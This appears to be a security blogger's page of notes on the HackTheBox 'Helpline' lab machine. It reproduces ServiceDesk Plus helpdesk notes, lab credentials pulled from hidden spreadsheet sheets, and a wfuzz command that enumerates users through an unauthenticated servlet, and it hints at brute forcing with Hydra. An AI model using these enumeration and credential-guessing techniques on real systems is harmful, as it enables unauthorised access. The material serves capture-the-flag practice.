<!DOCTYPE html>
<html>
  <head>
    <title>Pwny_Sec</title>
    
      <meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="revised" content="2019-10-07T22:50:30 EDT">
<title>Helpdesk-Notes :: Pwny_Sec</title>
<link rel="shortcut icon" href="/images/favicon.png" type="image/x-icon" />
<link href="/css/font-awesome.min.css" rel="stylesheet">
<link href="/css/nucleus.css" rel="stylesheet">
<link href="/theme-flex/style.css" rel="stylesheet">

	<link href="/theme-flex/variant-red.css" rel="stylesheet">

<link rel="stylesheet" href="/css/bootstrap.min.css">
<script src="/js/jquery-2.x.min.js"></script>
<script type="text/javascript">
      var baseurl = "\/";
</script>
<meta name="description" content="">



    
  </head>
  <body data-url="/hackthebox/boxes/helpline/notes/">
    
      <header>
  <div class="logo">
    




<h2 id="pwny-sec">Pwny_Sec</h2>




  </div>
  <div class="burger"><a href="javascript:void(0);" style="font-size:15px;">&#9776;</a></div>
    <nav class="shortcuts">
            <li class="" role="">
                <a href="https://twitter.com/pwny_sec"  rel="noopener">
                  <i class='fa fa-twitter'></i> <label>Twitter</label>
                </a>
            </li>
            <li class="" role="">
                <a href="https://github.com/vjeantet/hugo-theme-docdock"  rel="noopener">
                  <i class='fa fa-github'></i> <label>Github repo</label>
                </a>
            </li>
            <li class="" role="">
                <a href="https://chickenpwny.github.io/images/meme/raw.gif"  rel="noopener">
                  <i class='fa fa-cloud-download'></i> <label>Download</label>
                </a>
            </li>
            <li class="" role="">
                <a href="#"  rel="noopener">
                  <i class='fa fa-bookmark'></i> <label>Book Mark</label>
                </a>
            </li>
            <li class="" role="">
                <a href="/credits"  rel="noopener">
                  <i class='fa fa-bullhorn'></i> <label>Credits</label>
                </a>
            </li>
    </nav>
</header>
<article>
  <aside>
    <ul class="menu">
<a href="http://chickenpwny.github.io"><img src="/images/meme/home.jpg" alt="Alternate Text" style="width:45%;margin-left:auto;margin-right:auto;border-radius:50%;display:block;" alt="Home" /></a>
<li data-nav-id="/concepts/" class="dd-item haschildren
        ">
    <div>
        <a href="/concepts/">Concept</a><i class="fa fa-angle-right fa-lg category-icon"></i><i class="fa fa-circle-thin read-icon"></i>
    </div>
    <ul>
<li data-nav-id="/concepts/dll/" class="dd-item">
    <div>
        <a href="/concepts/dll/">
            DLL_CraFt&amp;BreW
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/concepts/untitled/" class="dd-item">
    <div>
        <a href="/concepts/untitled/">
            Desync-Attack
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/concepts/file-transfer/" class="dd-item">
    <div>
        <a href="/concepts/file-transfer/">
            File Transfer
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/concepts/webapppentest/" class="dd-item haschildren
        ">
    <div>
        <a href="/concepts/webapppentest/">WebAppPenTests</a><i class="fa fa-angle-right fa-lg category-icon"></i><i class="fa fa-circle-thin read-icon"></i>
    </div>
    <ul>
<li data-nav-id="/concepts/webapppentest/lfi/" class="dd-item
        ">
    <div>
        <a href="/concepts/webapppentest/lfi/"> Local File inclusion</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/concepts/webapppentest/heartbld/" class="dd-item
        ">
    <div>
        <a href="/concepts/webapppentest/heartbld/">HeartBleed</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/concepts/webapppentest/osinjcmd/" class="dd-item
        ">
    <div>
        <a href="/concepts/webapppentest/osinjcmd/">OS Command Injection</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/concepts/webapppentest/phptypejuggling/" class="dd-item
        ">
    <div>
        <a href="/concepts/webapppentest/phptypejuggling/">PHP Typw Juggling</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
    </ul>
</li>
<li data-nav-id="/concepts/bypass/" class="dd-item">
    <div>
        <a href="/concepts/bypass/">
            Windows-Bypass
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
    </ul>
</li>
<li data-nav-id="/hackthebox/" class="dd-item parent haschildren
        ">
    <div>
        <a href="/hackthebox/">HackTheBox</a>
        <i class="fa fa-angle-down fa-lg category-icon"></i><i class="fa fa-circle-thin read-icon"></i>
    </div>
    <ul>
<li data-nav-id="/hackthebox/boxes/" class="dd-item parent haschildren
        ">
    <div>
        <a href="/hackthebox/boxes/">Boxes</a>
        <i class="fa fa-angle-down fa-lg category-icon"></i><i class="fa fa-circle-thin read-icon"></i>
    </div>
    <ul>
<li data-nav-id="/hackthebox/boxes/hawk/" class="dd-item
        ">
    <div>
        <a href="/hackthebox/boxes/hawk/"></a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/arkham/" class="dd-item haschildren
        ">
    <div>
        <a href="/hackthebox/boxes/arkham/">Arkhams</a><i class="fa fa-angle-right fa-lg category-icon"></i><i class="fa fa-circle-thin read-icon"></i>
    </div>
    <ul>
<li data-nav-id="/hackthebox/boxes/arkham/writeup/" class="dd-item
        ">
    <div>
        <a href="/hackthebox/boxes/arkham/writeup/">ARKHAM-writeup</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/arkham/notes/" class="dd-item
        ">
    <div>
        <a href="/hackthebox/boxes/arkham/notes/">arkham notes</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
    </ul>
</li>
<li data-nav-id="/hackthebox/boxes/bastion/" class="dd-item haschildren
        ">
    <div>
        <a href="/hackthebox/boxes/bastion/">Bastions</a><i class="fa fa-angle-right fa-lg category-icon"></i><i class="fa fa-circle-thin read-icon"></i>
    </div>
    <ul>
<li data-nav-id="/hackthebox/boxes/bastion/notes/" class="dd-item
        ">
    <div>
        <a href="/hackthebox/boxes/bastion/notes/">Bastion-Golden</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/bastion/writeup/" class="dd-item
        ">
    <div>
        <a href="/hackthebox/boxes/bastion/writeup/">Bastion-Notes</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
    </ul>
</li>
<li data-nav-id="/hackthebox/boxes/blue/" class="dd-item
        ">
    <div>
        <a href="/hackthebox/boxes/blue/">Blue</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/chaos-og/" class="dd-item">
    <div>
        <a href="/hackthebox/boxes/chaos-og/">
            CHAOS
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/inusectf/" class="dd-item">
    <div>
        <a href="/hackthebox/boxes/inusectf/">
            CTF
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/carrier/" class="dd-item">
    <div>
        <a href="/hackthebox/boxes/carrier/">
            Carrier
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/carrier-root/" class="dd-item">
    <div>
        <a href="/hackthebox/boxes/carrier-root/">
            CarrierRoot
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/crimestoppers/" class="dd-item
        ">
    <div>
        <a href="/hackthebox/boxes/crimestoppers/">CrimeStopper</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/devel/" class="dd-item">
    <div>
        <a href="/hackthebox/boxes/devel/">
            Devel
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/ethereal/" class="dd-item">
    <div>
        <a href="/hackthebox/boxes/ethereal/">
            Ethereal
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/flujab/" class="dd-item">
    <div>
        <a href="/hackthebox/boxes/flujab/">
            Flujab
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/friendzone/" class="dd-item">
    <div>
        <a href="/hackthebox/boxes/friendzone/">
            FriendZone
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/grand-pa/" class="dd-item">
    <div>
        <a href="/hackthebox/boxes/grand-pa/">
            GrandMa
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/helpline/" class="dd-item parent haschildren
        ">
    <div>
        <a href="/hackthebox/boxes/helpline/">Helplines</a>
        <i class="fa fa-angle-down fa-lg category-icon"></i><i class="fa fa-circle-thin read-icon"></i>
    </div>
    <ul>
<li data-nav-id="/hackthebox/boxes/helpline/writeup/" class="dd-item
        ">
    <div>
        <a href="/hackthebox/boxes/helpline/writeup/">HelpLine-WriteUp</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/helpline/notes/" class="dd-item parent active
        ">
    <div>
        <a href="/hackthebox/boxes/helpline/notes/">Helpdesk-Notes</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
    </ul>
</li>
<li data-nav-id="/hackthebox/boxes/legacy/" class="dd-item
        ">
    <div>
        <a href="/hackthebox/boxes/legacy/">Legacy</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/lightweight/" class="dd-item">
    <div>
        <a href="/hackthebox/boxes/lightweight/">
            LightWeight
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/mischief/" class="dd-item
        ">
    <div>
        <a href="/hackthebox/boxes/mischief/">Mischief</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/help/" class="dd-item
        ">
    <div>
        <a href="/hackthebox/boxes/help/">Network Manager Down</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/help/" class="dd-item">
    <div>
        <a href="/hackthebox/boxes/help/">
            Network Manager Down
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/optimum/" class="dd-item">
    <div>
        <a href="/hackthebox/boxes/optimum/">
            Optimum
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/poison/" class="dd-item
        ">
    <div>
        <a href="/hackthebox/boxes/poison/">Poison</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/secnotes/" class="dd-item
        ">
    <div>
        <a href="/hackthebox/boxes/secnotes/">SecNotes</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/sense/" class="dd-item">
    <div>
        <a href="/hackthebox/boxes/sense/">
            Sense
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/sizzle/" class="dd-item">
    <div>
        <a href="/hackthebox/boxes/sizzle/">
            Sizzle
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/gold-sizzle/" class="dd-item">
    <div>
        <a href="/hackthebox/boxes/gold-sizzle/">
            Sizzle-Gold
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/sneaky/" class="dd-item">
    <div>
        <a href="/hackthebox/boxes/sneaky/">
            Sneaky
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/valentine/" class="dd-item
        ">
    <div>
        <a href="/hackthebox/boxes/valentine/">Valentine</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/vault/" class="dd-item">
    <div>
        <a href="/hackthebox/boxes/vault/">
            Vault
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/waldo/" class="dd-item
        ">
    <div>
        <a href="/hackthebox/boxes/waldo/">Waldo</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/zipper/" class="dd-item
        ">
    <div>
        <a href="/hackthebox/boxes/zipper/">Zipper</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/oz/" class="dd-item
        ">
    <div>
        <a href="/hackthebox/boxes/oz/">oz</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/sunday/" class="dd-item
        ">
    <div>
        <a href="/hackthebox/boxes/sunday/">sunday</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/hackthebox/boxes/teacher/" class="dd-item">
    <div>
        <a href="/hackthebox/boxes/teacher/">
            teacher
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
    </ul>
</li>
<li data-nav-id="/hackthebox/github/" class="dd-item haschildren
        ">
    <div>
        <a href="/hackthebox/github/">GitHub</a><i class="fa fa-angle-right fa-lg category-icon"></i><i class="fa fa-circle-thin read-icon"></i>
    </div>
    <ul>
<li data-nav-id="/hackthebox/github/hugopowershell/" class="dd-item">
    <div>
        <a href="/hackthebox/github/hugopowershell/">
            Hugo/Github/Power
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
    </ul>
</li>
<li data-nav-id="/hackthebox/challenges/" class="dd-item haschildren
        ">
    <div>
        <a href="/hackthebox/challenges/">Miscellaneous</a><i class="fa fa-angle-right fa-lg category-icon"></i><i class="fa fa-circle-thin read-icon"></i>
    </div>
    <ul>
<li data-nav-id="/hackthebox/challenges/bloodhound/" class="dd-item">
    <div>
        <a href="/hackthebox/challenges/bloodhound/">
            
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
    </ul>
</li>
<li data-nav-id="/hackthebox/tmux/" class="dd-item">
    <div>
        <a href="/hackthebox/tmux/">
            TMUX
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
    </ul>
</li>
<li data-nav-id="/linux/" class="dd-item haschildren
        ">
    <div>
        <a href="/linux/">Linuxes</a><i class="fa fa-angle-right fa-lg category-icon"></i><i class="fa fa-circle-thin read-icon"></i>
    </div>
    <ul>
<li data-nav-id="/linux/ftp/" class="dd-item">
    <div>
        <a href="/linux/ftp/">
            FTP
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/linux/filetransfer/" class="dd-item">
    <div>
        <a href="/linux/filetransfer/">
            File Transfer
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/linux/linux/" class="dd-item">
    <div>
        <a href="/linux/linux/">
            Linux
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/linux/netcat/" class="dd-item
        ">
    <div>
        <a href="/linux/netcat/">NetCat PORT SCAN</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/linux/nmap/" class="dd-item">
    <div>
        <a href="/linux/nmap/">
            Nmap
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/linux/snmpwalk/" class="dd-item
        ">
    <div>
        <a href="/linux/snmpwalk/">SNMPWalk</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/linux/tunneling/" class="dd-item">
    <div>
        <a href="/linux/tunneling/">
            Tunnels
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/linux/ssh/" class="dd-item">
    <div>
        <a href="/linux/ssh/">
            ssh
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
    </ul>
</li>
<li data-nav-id="/webapp/" class="dd-item haschildren
        ">
    <div>
        <a href="/webapp/">WebApps</a><i class="fa fa-angle-right fa-lg category-icon"></i><i class="fa fa-circle-thin read-icon"></i>
    </div>
    <ul>
<li data-nav-id="/webapp/exploiting/" class="dd-item">
    <div>
        <a href="/webapp/exploiting/">
            
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/webapp/burp/" class="dd-item haschildren
        ">
    <div>
        <a href="/webapp/burp/">Burp</a><i class="fa fa-angle-right fa-lg category-icon"></i><i class="fa fa-circle-thin read-icon"></i>
    </div>
    <ul>
<li data-nav-id="/webapp/burp/burp/" class="dd-item">
    <div>
        <a href="/webapp/burp/burp/">
            Burp
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/webapp/burp/burp-ca/" class="dd-item">
    <div>
        <a href="/webapp/burp/burp-ca/">
            Burp Setup CA
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
    </ul>
</li>
<li data-nav-id="/webapp/gobuster/" class="dd-item">
    <div>
        <a href="/webapp/gobuster/">
            GoBuster
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/webapp/http-smuggling/" class="dd-item">
    <div>
        <a href="/webapp/http-smuggling/">
            HTTP SMUGGLING
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/webapp/hydra/" class="dd-item">
    <div>
        <a href="/webapp/hydra/">
            Hydra
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/webapp/skipfish/" class="dd-item
        ">
    <div>
        <a href="/webapp/skipfish/">SkipFish</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/webapp/sqlmap/sqlmap/" class="dd-item">
    <div>
        <a href="/webapp/sqlmap/sqlmap/">
            SqlMap
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/webapp/user-inputt/" class="dd-item">
    <div>
        <a href="/webapp/user-inputt/">
            USER INPUT OF DOOM
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/webapp/wfuzz/" class="dd-item
        ">
    <div>
        <a href="/webapp/wfuzz/">WFuzz</a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
    </ul>
</li>
<li data-nav-id="/windows/" class="dd-item haschildren
        ">
    <div>
        <a href="/windows/">Windows</a><i class="fa fa-angle-right fa-lg category-icon"></i><i class="fa fa-circle-thin read-icon"></i>
    </div>
    <ul>
<li data-nav-id="/windows/bloodhound/" class="dd-item">
    <div>
        <a href="/windows/bloodhound/">
            BloodHound Neo4j
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/windows/chisel/" class="dd-item">
    <div>
        <a href="/windows/chisel/">
            ChiselTunnel
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/windows/filetransfer/" class="dd-item">
    <div>
        <a href="/windows/filetransfer/">
            File Transfer
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/windows/linux-smb-enum/" class="dd-item">
    <div>
        <a href="/windows/linux-smb-enum/">
            SMB
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/windows/smb/" class="dd-item">
    <div>
        <a href="/windows/smb/">
            SMB-KALI
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
<li data-nav-id="/windows/windows_enum/" class="dd-item">
    <div>
        <a href="/windows/windows_enum/">
            Windows
        </a><i class="fa fa-circle-thin read-icon"></i>
    </div>
</li>
    </ul>
</li>



    </ul>
    <section>
    </section>
  </aside>
  <section class="page">
    
    <div class="nav-select">
      <center>Navigation : 
        <select onchange="javascript:location.href = this.value;">
          
    <option value="/concepts/" >
   Concept</option>
    <option value="/hackthebox/" >
   HackTheBox</option> 
    <option value="/hackthebox/boxes/" >
  - 
   Boxes</option> 
    <option value="/hackthebox/boxes/hawk/" >
  -- 
   </option>
    <option value="/hackthebox/boxes/arkham/" >
  -- 
   Arkhams</option>
    <option value="/hackthebox/boxes/bastion/" >
  -- 
   Bastions</option>
    <option value="/hackthebox/boxes/blue/" >
  -- 
   Blue</option>
      <option value="/hackthebox/boxes/chaos-og/" >-- CHAOS</option>
      <option value="/hackthebox/boxes/inusectf/" >-- CTF</option>
      <option value="/hackthebox/boxes/carrier/" >-- Carrier</option>
      <option value="/hackthebox/boxes/carrier-root/" >-- CarrierRoot</option>
    <option value="/hackthebox/boxes/crimestoppers/" >
  -- 
   CrimeStopper</option>
      <option value="/hackthebox/boxes/devel/" >-- Devel</option>
      <option value="/hackthebox/boxes/ethereal/" >-- Ethereal</option>
      <option value="/hackthebox/boxes/flujab/" >-- Flujab</option>
      <option value="/hackthebox/boxes/friendzone/" >-- FriendZone</option>
      <option value="/hackthebox/boxes/grand-pa/" >-- GrandMa</option>
    <option value="/hackthebox/boxes/helpline/" >
  -- 
   Helplines</option> 
    <option value="/hackthebox/boxes/helpline/writeup/" >
  --- 
   HelpLine-WriteUp</option>
    <option value="/hackthebox/boxes/helpline/notes/"  selected>
  --- 
   Helpdesk-Notes</option> 
  
  
    <option value="/hackthebox/boxes/legacy/" >
  -- 
   Legacy</option>
      <option value="/hackthebox/boxes/lightweight/" >-- LightWeight</option>
    <option value="/hackthebox/boxes/mischief/" >
  -- 
   Mischief</option>
    <option value="/hackthebox/boxes/help/" >
  -- 
   Network Manager Down</option>
      <option value="/hackthebox/boxes/help/" >-- Network Manager Down</option>
      <option value="/hackthebox/boxes/optimum/" >-- Optimum</option>
    <option value="/hackthebox/boxes/poison/" >
  -- 
   Poison</option>
    <option value="/hackthebox/boxes/secnotes/" >
  -- 
   SecNotes</option>
      <option value="/hackthebox/boxes/sense/" >-- Sense</option>
      <option value="/hackthebox/boxes/sizzle/" >-- Sizzle</option>
      <option value="/hackthebox/boxes/gold-sizzle/" >-- Sizzle-Gold</option>
      <option value="/hackthebox/boxes/sneaky/" >-- Sneaky</option>
    <option value="/hackthebox/boxes/valentine/" >
  -- 
   Valentine</option>
      <option value="/hackthebox/boxes/vault/" >-- Vault</option>
    <option value="/hackthebox/boxes/waldo/" >
  -- 
   Waldo</option>
    <option value="/hackthebox/boxes/zipper/" >
  -- 
   Zipper</option>
    <option value="/hackthebox/boxes/oz/" >
  -- 
   oz</option>
    <option value="/hackthebox/boxes/sunday/" >
  -- 
   sunday</option>
      <option value="/hackthebox/boxes/teacher/" >-- teacher</option>
  
    <option value="/hackthebox/github/" >
  - 
   GitHub</option>
    <option value="/hackthebox/challenges/" >
  - 
   Miscellaneous</option>
      <option value="/hackthebox/tmux/" >- TMUX</option>
  
    <option value="/linux/" >
   Linuxes</option>
    <option value="/webapp/" >
   WebApps</option>
    <option value="/windows/" >
   Windows</option>



        </select>
      </center>
    </div>
      <div>
        <div class="searchbox">
          <input data-search-input id="search-by" type="text" placeholder="Search...">
        </div>
        <script type="text/javascript" src="/js/lunr.min.js"></script>
        <script type="text/javascript" src="/js/auto-complete.js"></script>
        <link href="/css/auto-complete.css" rel="stylesheet">
        <script type="text/javascript">
          
              var baseurl = "\/";
          
        </script>
        <script type="text/javascript" src="/js/search.js"></script>
      </div>
    

    <h1>Helpdesk-Notes</h1>
    
    
    



<p>MEGABANK Solutions</p>

<p><strong>General</strong></p>

<p>(password audit) author : Luis R. UPDATED = administrator / suspecting she isn&rsquo;t the true administrator</p>

<pre><code>&quot;Please see password audit attached.  Continue to update this spreadsheet with identified credentials.&quot;
note:A password audit has been done
</code></pre>

<p>(support)</p>

<pre><code>Please follow the steps mentioned below for support file generation:

    Go to 'Support' tab.
    Click on 'Support File'. This would create a file with extension zip.gz
    Please mail this file to servicedeskplus-support@manageengine.com

    [ Valid as on ServiceDesk Plus release 7.0 ]
</code></pre>

<p>(servicedesk <strong>upgrade</strong>) author : Luis R.</p>

<pre><code>This is important a domain name change has been issues from http to https 
http://euservicedesk
https://euservicedesk
DETAILS: 172.16.249.137 
AddSolution.do?Submitaction=newsolution
CustomReportHandler.do
Luis is a administrator
</code></pre>

<p>(remote.access) author : Luis Ribeiro Date= dec, 22 2018</p>

<pre><code>*remoteaccess.megabank.com ##### (chrome &amp; internet explorer)
*password Windows UserName \PASS
username+employee number
*Enter employee number
# notes email icon's/ share icons / internet explorer icon can be used so some automater user might be here. phone numbers
</code></pre>

<p>Notes HardWare author : Luis Ribeiro date = above</p>

<pre><code>windows 10 server 2016 used in enviroment. ssd drive erase software is in a directory.
http://www.datarecoveryspecialists.co.uk/blog/how-to-securely-erase-an-ssd 
</code></pre>

<p>SOFTWARE AUTHOR : administrator date July 14th</p>

<p>(settings)</p>

<pre><code>You can move the data from the existing server to new server. Please follow the steps mentioned below:

1. Stop ManageEngine ServiceDesk Plus service

2. Kindly Upgrade the SD+ if needed. Take the link below to check if you are in the latest version;
http://manageengine.com/products/service-desk/service-packs.html
Now start and stop the service once after the upgrade process.

3. In the command prompt, move to [ServiceDeskPlus-Home]\bin directory and execute backupdata.batto start the data backup. Once the backup is over, a directory named &quot;backup&quot; will be created in [ServiceDeskPlus-Home], within which another directory with the name &quot;Backup_[Versionnumber]_Monthdate_Year_Hour_Minutes&quot; will be created and the backup file with .data extension is placed in this directory. The name of the backup file contains the date and time at which backup is taken. Example:BackUp_5501_SEP14_2006_15_51.data

cmd&gt; [ServiceDeskPlus Home]\bin
cmd&gt; backUpData.bat

4. Install SD+ to the new server.

5. Copy the backup folder from the old server to [ServiceDeskPlus-Home] in the new server.

6.To restore the backed up data, Go to [ServiceDeskPlus-Home]\bin directory and execute restoredata.bat. Choose the backup file while prompted. See example below:

cmd&gt; [ServiceDeskPlus Home]\bin
cmd&gt; restoreData.bat



7. Start the SD+ server once after restoring the data in the new server.


[ Valid as on ServiceDesk Plus release 7.0 ]

</code></pre>

<p>(customizations)</p>

<pre><code>Find below the procedure to meet with your need:

1. Save the page served under http://[servername-or-ipaddress:port-number] as index.html. Copy this file onto C:\ManageEngine\ServiceDesk\applications\extracted\AdventNetServiceDesk.eear\AdventNetServiceDeskWC.ear\AdventNetServiceDesk.war

2. Modify the index.html page as per your needs and the save the file under the same location.

3. Keep the FORM Submit and Action options as they are.

4. Edit the Web.xml file present under C:\ManageEngine\ServiceDesk\applications\extracted\AdventNetServiceDesk.eear\AdventNetServiceDeskWC.ear\AdventNetServiceDesk.war\WEB-INF and change the following:

&lt;form-login-page&gt;/Login.jsp&lt;/form-login-page&gt;


should be changed as

&lt;form-login-page&gt;/index.html&lt;/form-login-page&gt;

AND

&lt;form-error-page&gt;/Login.jsp?error=true&lt;/form-error-page&gt;

should be changed as

&lt;form-error-page&gt;/index.html&lt;/form-error-page&gt;

5. Restart ServiceDesk Plus service.

6. You can now access the modified index page as http://[servername-or-ipaddress:port-number]/index.html

Note: This file is bound to changes everytime a servicepack or hotfix is released. Hence, when you apply the hotfix or servicepack, you must redo the changes.


[ Valid as on ServiceDesk Plus release 7.0 ]
</code></pre>

<p>(troubleshooting)</p>

<pre><code>Please follow the steps mentioned below for support file generation:

    Go to 'Support' tab.
    Click on 'Support File'. This would create a file with extension zip.gz
    Please mail this file to servicedeskplus-support@manageengine.com

    [ Valid as on ServiceDesk Plus release 7.0 ]
</code></pre>

<p>Found a excelsheet. i installed openoffice to view the .xlsx file. The initial finding are underwhelming but some content has been hidden. Go to format &gt; select sheet &gt; show. this will show all hidden sheets. Which will reveal some more notes. We find usernames, passwords. it also reveals some of the finer details privileges which accounts share the same password. Also what systems are associated with the passwords. we become aware of a directory it_logins.txt  squee</p>

<p><img src="../../pwn/Yugi_and_co._looking_for_the_true_door.png" alt="Yugi_and_co._looking_for_the_true_door" /></p>

<p><img src="pass-audit.PNG" alt="pass-audit" /></p>

<pre><code>The recent penetration test revealed some accounts with weak password security, probably there are more.   We should also consider something that can automate account discovery.

Please update this document with any accounts/logins which you suspect have weak / easily guessable passwords. 
</code></pre>

<table>
<thead>
<tr>
<th>oracle</th>
<th>scott</th>
<th>tiger</th>
<th>priv</th>
</tr>
</thead>

<tbody>
<tr>
<td>wordpresshydra</td>
<td>admin</td>
<td>megabank1</td>
<td>priv</td>
</tr>

<tr>
<td>windows 7 local admin</td>
<td>Administrator</td>
<td>Megabank123!</td>
<td></td>
</tr>

<tr>
<td>MFT download</td>
<td>clients</td>
<td>megabank1</td>
<td></td>
</tr>

<tr>
<td>jump box</td>
<td>gavin</td>
<td></td>
<td>priv</td>
</tr>
</tbody>
</table>

<pre><code>File containing details from subsequent audit saved to C:\Temp\Password Audit\it_logins.txt on HELPLINE
</code></pre>

<p><img src="pass-audit2.PNG" alt="pass-audit2" /></p>

<p>The Ability to seach for users. This added some new users anne, fiona, mary, stephen</p>

<pre><code>wfuzz -c -w /home/htb/wordlist/seclist/Usernames/Names/names.txt -u &quot;http://10.10.10.132:8080/domainServlet/AJaxDomainServlet?action=searchLocalAuthDomain&amp;timestamp=Thu%20Jun%2006%202019%2013:30:22%20GMT-0400%20(EDT)&amp;search=FUZZ&quot; --hh 4 
</code></pre>

<p><img src="user-enumeration.PNG" alt="user-enumeration" /></p>

<p><img src="user-enumeration2.PNG" alt="user-enumeration2" /></p>

<p><img src="user-enumeration3.PNG" alt="user-enumeration3" /></p>

<p>HYDRA!</p>

